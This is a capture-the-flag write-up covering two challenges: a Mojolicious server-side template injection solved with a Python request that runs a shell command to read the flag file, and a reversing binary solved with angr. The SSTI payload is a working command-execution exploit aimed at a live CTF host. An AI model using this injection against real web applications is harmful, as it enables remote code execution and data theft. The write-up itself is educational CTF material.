ctf-writeups

CTF scripts and writeups (mostly challenge + .py solving script)

View on GitHub

Challenge: camels

The variant parameter is extracted from the URL using param($c->req->url->query, "variant"):

sub param {
    my $__ = (split(/::/,(caller(0))[3]))[-1];
    my $___ = $_[0]->$__($__) || $__;
    my @____ = $_[0]->$___($_[1]);
    return ref($____[0]) ? @{$____[0]} : $____[0];
}

$q is Mojo::Parameters which contains method clone that allow us to populate the hash containing the arguments to $c->render(...), i.e. we can add argument inline => 'SSTI: <%= 1 + 1 %>.' and do a server-side template injection attack (SSTI).

To avoid bash/curl formatting issues, I used the python library httpx (like requests) to create this payload:

import httpx
httpx.get("http://167.235.153.119:8403/", params={
    "param": "clone",
	"inline": "<%= `cat /camels/flag.txt` %>"
}).text
# 'BHCTF{you_and_the_camels_are_one}\n'

Challenge: Understanding is forthcoming (part 1)

Really cool binary! Luckily Angr somehow knows what is going on:

import angr

proj = angr.Project("./forthcoming", auto_load_libs=False)
state = proj.factory.entry_state()
simgr = proj.factory.simulation_manager(state)

simgr.explore(find=lambda s: "you got it" in s.posix.dumps(1))
# 1 path found! <SimulationManager with 2 active, 34 deadended, 1 found>

print(simgr.found[0].posix.dumps(0))  # dumps(0) is stdin
# b'BHCTF{d1d_y0u_3nj0Y_mY_l1ttl3_Rn9}\n'